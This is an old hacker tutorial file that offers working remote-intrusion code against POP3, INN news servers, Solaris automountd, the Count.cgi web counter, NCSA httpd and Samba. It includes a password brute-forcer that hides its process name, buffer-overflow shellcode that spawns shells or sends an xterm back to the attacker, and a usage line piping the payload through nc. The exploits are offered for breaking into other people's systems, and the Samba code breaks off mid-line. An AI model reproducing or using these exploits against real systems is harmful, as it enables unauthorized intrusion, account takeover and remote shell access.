How to get in... (remote)
-------------------------------------
by Phantom

Well, folks, once you've gotten the name of the site, it's fairly hard (:)) to get inside, especially if it has a firewall && stuph.. But, if you get enough info on that site, maybe, just maybe, you might get in.. So, you might think of programs you could use to get a root shell or maybe a passwd/shadow file... :) Well, you should definitely look for open ports, like imapd/httpd/sendmail/nntp/pop3 && stuff...

Well, in this file, you won't find any exploits, due to complaints about how we provide stuff to remotely break into somebody's system. So, if you have a user there, it's your responsibility, but if we provide you with such tools, it seems people think it's our responsibility... so, DON'T READ ANY FURTHER!!!!!!!!!!!!!!!!!!!!!!!!!!! :)

But anyway, if you really need some of those programs, here are a couple of them...

Here is an uuencoded package to exploit imap2:

[uuencoded imap.tgz archive omitted]

Now, here's a pop3 hacker...:

/*
 : After recently installing POP3d on a machine, I played around with it a
 : bit and came to a few conclusions:
 : 1) It allows for multiple username/password guesses
 : 2) There is no logging option for bad user/pass guesses.
 : This seems like something just begging to be brute force hacked.
 : Any comments?
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include

/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110

/* What we want our program to be masked as, so nosy sysadmins dont kill us */
#define MASKAS "vi"

/* Repeat connect or not - remember, logs still report a connection, so you
   might want to set this to 0. If set to 0, it will hack until it finds 1
   user/password then exit.
   If set to 1, it will reconnect and try more user/passwords (until it runs
   out of usernames) */
#define RECONNECT 0

/* The function prototypes */
void nuke_string(char *);
int pop_connect(char *);
int pop_guess(char *, char *);
char *getanswer(char *);
char *getanswer_(char *);
void swallow_welcome(void);
void hackity_hack(void);

int popfd;
FILE *popfp;
FILE *userfile;
FILE *dictfile;
char host[255];
char dict[255];
char user[255];

main(int argc, char **argv)
{
    if(argc < 4) {
        /* invalid syntax, display syntax and exit */
        printf("Syntax: %s host userfile dictfile\n", argv[0]);
        exit(0);
    }
    /* Validate that the host exists */
    if(pop_connect(argv[1]) == -1) {
        /* Error */
        printf("Error connecting to host %s\n", argv[1]);
        exit(0);
    }
    printf("Connected to: %s\n\n", argv[1]);
    /* Check for the existence of the user file */
    userfile=fopen(argv[2], "rt");
    if(userfile==NULL) {
        /* Error */
        printf("Error opening userfile %s\n", argv[2]);
        exit(0);
    }
    fclose(userfile);
    /* Checking for the existence of dict file */
    dictfile=fopen(argv[3], "rt");
    if(dictfile==NULL) {
        /* Error */
        printf("Error opening dictfile %s\n", argv[3]);
        exit(0);
    }
    fclose(dictfile);
    /* Copy important arguments to variables */
    strcpy(host, argv[1]);
    strcpy(user, argv[2]);
    strcpy(dict, argv[3]);
    nuke_string(argv[0]);
    nuke_string(argv[1]);
    nuke_string(argv[2]);
    nuke_string(argv[3]);
    strcpy(argv[0], MASKAS);
    swallow_welcome();
    hackity_hack();
}

void nuke_string(char *targetstring)
{
    char *mystring=targetstring;
    while(*targetstring != '\0') {
        *targetstring=' ';
        targetstring++;
    }
    *mystring='\0';
}

int pop_connect(char *pophost)
{
    int popsocket;
    struct sockaddr_in sin;
    struct hostent *hp;
    hp=gethostbyname(pophost);
    if(hp==NULL) return -1;
    bzero((char *)&sin,sizeof(sin));
    bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
    sin.sin_family=hp->h_addrtype;
    sin.sin_port=htons(POP3_PORT);
    popsocket=socket(AF_INET, SOCK_STREAM, 0);
    if(popsocket==-1) return -1;
    if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1)
        return -1;
    popfd=popsocket;
    return popsocket;
}

int pop_guess(char *username, char *password)
{
    char buff[512];
    sprintf(buff, "USER %s\n", username);
    send(popfd, buff, strlen(buff), 0);
    getanswer(buff);
    sprintf(buff, "PASS %s\n", password);
    send(popfd, buff, strlen(buff), 0);
    getanswer(buff);
    if(strstr(buff, "+OK") != NULL) {
        printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password);
        return 0;
    }
    else return -1;
}

char *getanswer(char *buff)
{
    for(;;) {
        getanswer_(buff);
        if(strstr(buff, "+OK") != NULL) return buff;
        if(strstr(buff, "-ERR") != NULL) return buff;
    }
}

char *getanswer_(char *buff)
{
    int ch;
    char *in=buff;
    for(;;) {
        ch=getc(popfp);
        if(ch == '\r');
        if(ch == '\n') {
            *in='\0';
            return buff;
        }
        else {
            *in=(char)ch;
            in++;
        }
    }
}

void swallow_welcome(void)
{
    char b[100];
    popfp=fdopen(popfd, "rt");
    getanswer(b);
}

void hackity_hack(void)
{
    char *un;
    char *pw;
    char *c;
    int found=0;
    un=(char *)malloc(512);
    pw=(char *)malloc(512);
    if(un==NULL || pw==NULL) return;
    userfile=fopen(user, "rt");
    dictfile=fopen(dict, "rt");
    if(userfile == NULL || dictfile == NULL) return;
    for(;;) {
        while(fgets(un, 50, userfile) != NULL) {
            found=0;
            c=strchr(un, 10);
            if(c != NULL) *c=0;
            c=strchr(un, 13);
            if(c != NULL) *c=0;
            while(fgets(pw, 50, dictfile) != NULL && found==0) {
                c=strchr(pw, 10);
                if(c != NULL) *c=0;
                c=strchr(pw, 13);
                if(c != NULL) *c=0;
                if(strlen(pw) > 2 && strlen(un) > 2)
                    if(pop_guess(un, pw)==0) {
                        found=1;
                        fclose(popfp);
                        close(popfd);
                        if(RECONNECT==0) {
                            free(pw);
                            free(un);
                            fclose(userfile);
                            fclose(dictfile);
                            exit(0);
                        }
                        pop_connect(host);
                        swallow_welcome();
                    }
            }
            fclose(dictfile);
            dictfile=fopen(dict, "rt");
        }
        fclose(dictfile);
        fclose(userfile);
        free(un);
        free(pw);
        exit(0);
    }
}

Anyways, you will probably need one of these thinggies: INN exploit...

----------------------------- innbuf.c --------------------------------
/*
 * This just generates the x86 shellcode and puts it in a file that nnrp
 * can send. The offset and/or esp may need changing. To compile
 * on most systems: cc innbuf.c -o innbuf. Usage: innbuf [offset] > file.
 * (C) 1997 by Method
 * P.S. Feel free to port this to other OS's.
 */

#include
#include
#include
#include

#define DEFAULT_OFFSET 792
#define BUFFER_SIZE 796
#define ADDRS 80

u_long get_esp()
{
    return(0xefbf95e4);
}

int main(int argc, char **argv)
{
    char *buff = NULL;
    u_long *addr_ptr = NULL;
    char *ptr = NULL;
    int ofs = DEFAULT_OFFSET;
    int noplen;
    u_long addr;
    int i;
    u_char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    if(argc > 1)
        ofs = atoi(argv[1]);
    addr = get_esp() - ofs;
    if(!(buff = malloc(4096))) {
        fprintf(stderr, "can't allocate memory\n");
        exit(1);
    }
    ptr = buff;
    noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;
    memset(ptr, 0x90, noplen);
    ptr += noplen;
    for(i = 0; i < strlen(execshell); i++)
        *ptr++ = execshell[i];
    addr_ptr = (unsigned long *)ptr;
    for(i = 0; i < ADDRS / 4; i++)
        *addr_ptr++ = addr;
    ptr = (char *)addr_ptr;
    *ptr = '\0';
    printf(
        "Path: dev.null!nntp\n"
        "From: devNull @%s\n"
        "Newsgroups: alt.test\n"
        "Subject: 4 out of 5 Dweebs prefer INND for getting r00t\n"
        "Message-ID: <830201540.9220@dev.null.com>\n"
        "Date: 9 Jun 1997 15:15:15 GMT\n"
        "Lines: 1\n"
        "\n"
        "this line left not left intentionally blank\n"
        ".\n", buff);
}
---------------------------------------------------------------------------

---------------------------- nnrp.c --------------------------------------
/*
 * Remote exploit for INN version < 1.6. Requires 'innbuf' program to operate.
 * To compile: cc nnrp.c -o nnrp. Usage: nnrp .
 * (C) 1997 by Method of Dweebs
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define POST "POST\n"
#define SAY(a, b) write(a, b, strlen(b))
#define CHOMP(a, b) read(a, b, sizeof(b))
#define basename(a) bname(a)

char *me;

make_addr(char *name, struct in_addr *addr)
{
    struct hostent *hp;
    if(inet_aton(name, addr) == 0) {
        if(!(hp = gethostbyname(name))) {
            fprintf(stderr, "%s: ", me);
            herror(name);
            exit(1);
        }
        addr->s_addr = ((struct in_addr *)hp->h_addr)->s_addr;
    }
}

char *bname(char *str)
{
    char *cp;
    if((cp = (char *)strrchr(str, '/')) != NULL)
        return(++cp);
    else
        return(str);
}

void my_err(char *errstr, int err)
{
    fprintf(stderr, "%s: ", me);
    perror(errstr);
    exit(err);
}

void usage()
{
    printf(
        "INN version 1.[45].x exploit by Method \n"
        "Usage: %s \n"
        "Will start a shell on the remote host.\n"
        "The second argument is the file containing the overflow data.\n", me);
    exit(1);
}

select_loop(int netfd)
{
    int ret, n, in = STDIN_FILENO, out = STDOUT_FILENO;
    char buf[512];
    fd_set rfds;
    for( ; ; ) {
        FD_ZERO(&rfds);
        FD_SET(in, &rfds);
        FD_SET(netfd, &rfds);
        if((ret = select(netfd + 1, &rfds, NULL, NULL, NULL)) < 0)
            my_err("select", 1);
        if(!ret) continue;
        if(FD_ISSET(in, &rfds)) {
            if((n = read(in, buf, sizeof(buf))) > 0)
                write(netfd, buf, n);
        }
        if(FD_ISSET(netfd, &rfds)) {
            if((n = read(netfd, buf, sizeof(buf))) > 0)
                write(out, buf, n);
            else
                break;
        }
    }
}

int news_sock(char *host)
{
    struct sockaddr_in sin;
    int sock;
    sin.sin_port = htons(119);
    sin.sin_family = AF_INET;
    make_addr(host, &(sin.sin_addr));
    if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        my_err("socket", 1);
    if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        my_err("connect", 1);
    return(sock);
}

void send_egg(int sk, char *file)
{
    char buf[BUFSIZ];
    int dfd;
    int n;
    if((dfd = open(file, O_RDONLY)) < 0)
        my_err("open", 1);
    printf("Executing innd exploit..
 be patient.\n");
    n = CHOMP(sk, buf);
    buf[n] = '\0';
    printf(buf);
    SAY(sk, POST);
    n = CHOMP(sk, buf);
    buf[n] = '\0';
    printf(buf);
    sleep(2);
    printf("Sending overflow data.\n");
    while((n = CHOMP(dfd, buf)) > 0)
        write(sk, buf, n);
    sleep(2);
}

void main(int argc, char **argv)
{
    char *victim, *filename;
    int s;
    me = basename(argv[0]);
    if(argc != 3)
        usage();
    filename = argv[2];
    send_egg(s = news_sock(victim = argv[1]), filename);
    select_loop(s);
    fprintf(stderr, "Connection closed.\n");
    printf("Remember: Security is futile. Dweebs WILL own you.\n");
    exit(0);
}
---------------------------------------------------------------------------

hehehehhahaha... kewl, huh ? And there is automountd, for SunOs 5.5.1... :)

/* this is really dumb automountd exploit, tested on solaris 2.5.1
   ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
   map is executed via popen with key given as argument, read automount(1M)
   patch 10465[45] fixes this */

#include
#include
#include
#include
#include
#include

#define AUTOTS "datagram_v" /* XXX */

void usage(char *s)
{
    printf("Usage: %s mountpoint map key [opts]\n", s);
    exit(0);
}

bool_t xdr_mntrequest(xdrs, objp)
    register XDR *xdrs;
    mntrequest *objp;
{
    register long *buf;
    if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
    if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
    if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
    if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
    return (TRUE);
}

bool_t xdr_mntres(xdrs, objp)
    register XDR *xdrs;
    mntres *objp;
{
    register long *buf;
    if (!xdr_int(xdrs, &objp->status)) return (FALSE);
    return (TRUE);
}

main(int argc, char *argv[])
{
    char hostname[MAXHOSTNAMELEN];
    CLIENT *cl;
    enum clnt_stat stat;
    struct timeval tm;
    struct mntrequest req;
    struct mntres result;
    if (argc < 4) usage(argv[0]);
    req.path=argv[1];
    req.map=argv[2];
    req.name=argv[3];
    req.opts=argv[4];
    if (gethostname(hostname, sizeof(hostname)) == -1) {
        perror("gethostname");
        exit(0);
    }
    if
    ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
        clnt_pcreateerror("clnt_create");
        exit(0);
    }
    tm.tv_sec=5;
    tm.tv_usec=0;
    stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req,
                   xdr_mntres, (char *)&result, tm);
    if (stat != RPC_SUCCESS)
        clnt_perror(cl, "mount call");
    else
        printf("mntres = %d.\n", result.status);
    clnt_destroy(cl);
}

Now, this here is very very dangerous, it exploits the Count.cgi, on the web servers.. :)

/*
   Count.cgi (wwwcount) linux test exploit
   (c) 05/1997 by plaguez - dube0866@eurobretagne.fr

   Contact me if you manage to improve this crap.
   This program needs drastic changes to be useable.
   If you can't understand how to modify it for your own purpose,
   please do not consider trying it.
*/

#include
#include

char shell[]=
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d"
    "\x5e\x18\x88\x46\x2c\x88\x46\x30"
    "\x88\x46\x39\x88\x46\x4b\x8d\x56"
    "\x20\x89\x16\x8d\x56\x2d\x89\x56"
    "\x04\x8d\x56\x31\x89\x56\x08\x8d"
    "\x56\x3a\x89\x56\x0c\x8d\x56\x10"
    "\x89\x46\x10\xb0\x0b\xcd\x80\x31"
    "\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
    "\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff\xff"
    "/usr/X11R6/bin/xterm0-ut0-display0"
    "127.000.000.001:00"
    "\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff\xff";

/*
   Assembly stuff for the previous buffer. This basically implements an
   execve syscall, by creating an array of char* (needs to put a null byte
   at the end of all strings). Here we gonna exec an xterm and send it to
   our host. (you can't simply exec a shell due to the cgi proto).

        jmp     60
        popl    %esi
        xorl    %eax,%eax           # clear eax
        movl    %esi,%ecx           # get the address of the buffer
        leal    0x18(%esi),%ebx     # get the address of the strings
        movb    %al,0x2c(%esi)      # build the asciiz strings
        movb    %al,0x30(%esi)      #
        movb    %al,0x39(%esi)
        movb    %al,0x4b(%esi)
        leal    0x20(%esi),%edx     # build the char**
        movl    %edx,(%esi)
        leal    0x2d(%esi),%edx
        movl    %edx,0x4(%esi)
        leal    0x31(%esi),%edx
        movl    %edx,0x8(%esi)
        leal    0x3a(%esi),%edx
        movl    %edx,0xc(%esi)
        leal    0x10(%esi),%edx
        movl    %eax,0x10(%esi)
        movb    $0xb,%al
        int     $0x80               # switch to kernel mode
        xorl    %ebx,%ebx           # exit cleanly (exit())
        movl    %ebx,%eax           # in case the execve() fails.
        inc     %eax                #
        int     $0x80               #
        call    -65                 # back to the popl, pushing the address of the string
        .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .ascii \"/usr/X11R6/bin/xterm0\"   # 44
        .ascii \"-ut0\"                    # 48
        .ascii \"-display0\"               # 57
        .ascii \"127.000.000.001:00\"      # 75 (total of the strings)
        .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        .byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
        ...
*/

char qs[7000];
char chaine[]="user=a";

unsigned long getesp()
{
    // asm("movl %esp,%eax");
    return 0xbfffee38;
}

void main(int argc, char **argv)
{
    int compt;
    long stack;
    stack=getesp();
    if(argc>1) stack+=atoi(argv[1]);
    for(compt=0;compt<4104;compt+=4) {
        qs[compt+0] = stack & 0x000000ff;
        qs[compt+1] = (stack & 0x0000ff00) >> 8;
        qs[compt+2] = (stack & 0x00ff0000) >> 16;
        qs[compt+3] = (stack & 0xff000000) >> 24;
    }
    strcpy(qs,chaine);
    qs[strlen(chaine)]=0x90;
    qs[4104]= stack&0x000000ff;
    qs[4105]=(stack&0x0000ff00)>>8;
    qs[4106]=(stack&0x00ff0000)>>16;
    qs[4107]=(stack&0xff000000)>>24;
    qs[4108]= stack&0x000000ff;
    qs[4109]=(stack&0x0000ff00)>>8;
    qs[4110]=(stack&0x00ff0000)>>16;
    qs[4111]=(stack&0xff000000)>>24;
    qs[4112]= stack&0x000000ff;
    qs[4113]=(stack&0x0000ff00)>>8;
    qs[4114]=(stack&0x00ff0000)>>16;
    qs[4115]=(stack&0xff000000)>>24;
    qs[4116]= stack&0x000000ff;
    qs[4117]=(stack&0x0000ff00)>>8;
    qs[4118]=(stack&0x00ff0000)>>16;
    qs[4119]=(stack&0xff000000)>>24;
    qs[4120]= stack&0x000000ff;
    qs[4121]=(stack&0x0000ff00)>>8;
    qs[4122]=(stack&0x00ff0000)>>16;
    qs[4123]=(stack&0xff000000)>>24;
    qs[4124]= stack&0x000000ff;
    qs[4125]=(stack&0x0000ff00)>>8;
    qs[4126]=(stack&0x00ff0000)>>16;
    qs[4127]=(stack&0xff000000)>>24;
    qs[4128]= stack&0x000000ff;
    qs[4129]=(stack&0x0000ff00)>>8;
    qs[4130]=(stack&0x00ff0000)>>16;
    qs[4131]=(stack&0xff000000)>>24;
    strcpy((char*)&qs[4132],shell);
    /* Choose what to do here */
    printf("GET /cgi-bin/Count.cgi?%s\n\n",qs);
    /*fprintf(stderr,"\n\nadresse: %x0x\n",stack);
    printf("GET /cgi-bin/Count.cgi?%s
 HTTP/1.0\nUser-Agent: %x\n\n",qs,stack);
    setenv("QUERY_STRING",qs,1);
    system("/usr/local/etc/httpd/cgi-bin/Count.cgi");
    system("/bin/sh");*/
}

And of course, The HTTPD Exploit ... :)

/*
 * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23
 *
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of ToXyn !!!
 *
 * usage:
 *  $ (hackttpd 0; cat) | nc victim 143
 *                |
 *                +--> usually from -1000 to 1000 (try steps of 100)
 */

#include

unsigned char shell[] = {
    '/',0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76,
    0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b,
    0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff,
    'b','i','n','/','s','h'
};

char username[256+8];

void main(int argc, char *argv[])
{
    int i,a;
    long val;
    if(argc>1)
        a=atoi(argv[1]);
    else
        a=0;
    strcpy(username,shell);
    for(i=strlen(shell);i> 8;
        username[i+2] = (val & 0x00ff0000) >> 16;
        username[i+3] = (val & 0xff000000) >> 24;
    }
    username[ sizeof(username) ] = 0;
    printf("GET %s\n/bin/bash -i 2>&1;\n",
        username);
}

And, last but not least, the samba ExpLoit.. :)

/*
 ___ ______ _ _ / \ | _ \ | \ / | | / \ | | | \ | | \_/ | | |___| | | |_ / | | \_/ | | --- | | / | | | | ''' ''' ''''''' '''' ''''

                   CreW Presente For Y0uR plEaSure

                 Samba remote & LocaL buffer overflow!

   found & exploited by some "blaireaux" and "mr3615phf" :)))))))))))

   recursive greetz: ADM !
   a special greetz to the ppl of the "offset effort" fr4wd,fratalG,and the
   rest of t0xyn , and my friend [oO giemor Oo] .
   big up to: da movement .
   codeurz greetz going to: aleph1 & to samba team
   anal greetz: #banane suxxxxxxxxxxx Hotlame & Co
------------------------------------------------------------------------------
   explain of the bug:
   is really simple if your send a large passwd bha your make a buffer
   overflow hahhahaha =) iam not good for explain go fuck !=)) --**JOKE**--
------------------------------------------------------------------------------
   patch ?? WHAT U WANNA A PATCH ??? :))))
------------------------------------------------------------------------------
   [SO..] we search the shellcode of other system (SUNos , solaris, etc)
   and specialy SCO !
------------------------------------------------------------------------------
   usage:
   first you must have a special smbclient for send a large large passwd
   how ?? tell me for the bin of
   get the source of samba and change in smb.h at line 248:
        typedef char pstring[1024];
   to
        typedef char pstring[20000];
   and now compile smbclient !
   # make smbclient [dont forget to edit the makefile !!]
   see the line 199 in makefile
-------------------------------------------------------------------------------
   mail 4 question, comments etc etc bla bla : admsmb@hotmail.com
-------------------------------------------------------------------------------
*/

/* Note i have include a little utility pinched from ADMtoolz for get the
   netbios name
--------------------------------------------------------------------------
------------------------------[ADMnmbname.c]----------------------------------
--------------------------------------------------------------------------
*/
#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#define NMBHDRSIZE 13

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct nmbhdr {
    unsigned short int id;
    unsigned char R:1;
    unsigned char opcode:4;
    unsigned char AA:1;
    unsigned char TC:1;
    unsigned char RD:1;
    unsigned char RA:1;
    unsigned char unless:2;
    unsigned char B:1;
    unsigned char RCODE:4;
    unsigned short int que_num;
    unsigned short int rep_num;
    unsigned short int num_rr;
    unsigned short int num_rrsup;
    unsigned char namelen;
};

struct typez {
    u_int type;
    u_int type2;
};

unsigned int host2ip(char *serv)
{
    struct sockaddr_in sin;
    struct hostent *hent;
    hent=gethostbyname(serv);
    if(hent == NULL) return 0;
    bzero((char *)&sin, sizeof(sin));
    bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length);
    return sin.sin_addr.s_addr;
}

main( int argc, char **argv)
{
    struct sockaddr_in sin_me , sin_dst;
    struct nmbhdr *nmb,*nmb2;
    struct iphdr *ipz;
    struct typez *typz;
    struct hostent *hent;
    int socket_client,sr,num,i=1,bha,timeout=0,try=0,GO=0;
    int longueur=sizeof(struct sockaddr_in);
    char *data;
    char *dataz;
    char buffer[1024];
    char buffer2[1024];
    char namezz[1024];
    char name[64]="CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
    char c;
    if(argc <2) {
        printf("usage: ADMnmbname \n");
        exit (0);
    }
    socket_client=socket(AF_INET,SOCK_DGRAM,17);
    sr=socket(AF_INET,SOCK_RAW,17);
    ioctl(sr,FIONBIO,&i);
    sin_me.sin_family=AF_INET;
    sin_me.sin_addr.s_addr=htonl(INADDR_ANY);
    sin_me.sin_port=htons(2600);
    sin_dst.sin_family=AF_INET;
    sin_dst.sin_port=htons(137);
    sin_dst.sin_addr.s_addr = host2ip(argv[1]);
    nmb = (struct nmbhdr *) buffer;
    data = (char *)(buffer+NMBHDRSIZE);
    typz = (struct typez *)(buffer+NMBHDRSIZE+33);
    nmb2 = (struct nmbhdr *)(buffer2+20+8);
    ipz = (struct iphdr *)buffer2;
    dataz = (char *)(buffer2+50+7+20+8);
    memset(buffer,0,1024);
    memset(buffer2,0,1024);
    memset(namezz,0,1024);
    memcpy(data,name,33);
    /* play with the netbios query format :) */
    nmb->id=0x003;
    nmb->R=0;               /* 0 for question 1 for response */
    nmb->opcode=0;          /* 0 = query */
    nmb->que_num=htons(1);  /* i have only 1 question :) */
    nmb->namelen=0x20;
    typz->type=0x2100;
    typz->type2=0x1000;
    sendto(socket_client,buffer,50,0,(struct sockaddr *)&sin_dst,longueur);
    for(timeout=0;timeout<90;timeout++ ) {
        usleep(100000);
        buffer2[0]='0';
        recvfrom(sr,buffer2,800,0,(struct sockaddr *)&sin_dst,&(int)longueur );
        if(buffer2[0]!='0') {
            if(nmb2->rep_num!=0) {
                bha=0;
                for(;;) {
                    c=*(dataz+bha);
                    if(c!='\x20') {
                        namezz[bha]=c;
                        bha++;
                    }
                    if(c=='\x20')break;
                }
                printf("netbios name of %s is %s\n",argv[1],namezz);
                try =4;
                GO = 4;
                break;
            }
        }
    }
    memset(buffer,0,1024);
    memset(buffer2,0,1024);
}

/*
---------------------------------------------------------------------------
----------------------------[ADMkillsamba.c]---------------------------------
---------------------------------------------------------------------------
   generic buffer overflow ameliored for samba sploit
   the sploit send a xterm to your machine .
   hey dont forget to do a xhost +IP-OF-VICTIM !!!!
   and put the the sploit to the same directory of the special smbclient !
*/

/* diz default offset and buffer size Work fine on a my system Redhat 4.2
   with samba server 1.9.17alpha5 < the last version !>
   i have tested on other system with this default buff & size
   smb 1.9.16p[9-11] the default srv on redhat 4.1 4.2
   but sometime you need to change the buffer size and offset
   try a buffer of ( 10501100) and a offset ( 15002500)
   mail me at admsmb@hotmail.com if u wanna some help */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90

#include
#include

unsigned char shellcode[500] =
    "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
    "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
    "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
    "\x80\xe8\xcc\xff\xff\xff";

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    char netbios_name[100];
    char bufferz[255];
    char ipz[40];
    char myipz[40];
    unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
    int *ret;
    unsigned char cmd[50]="/usr/bin/X11/xterm\xff-display\xff";
    unsigned char arg1[50];
    char arg2[50]="bhahah\xff";
    int i,pid;
    bzero(netbios_name,100);
    bzero(bufferz,255);
    bzero(ipz,40);
    bzero(ipz,40);
    if(argc <4){
        printf(" usage: ADMkillsamba [buff size] [offset size]\n");
        printf(" = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.
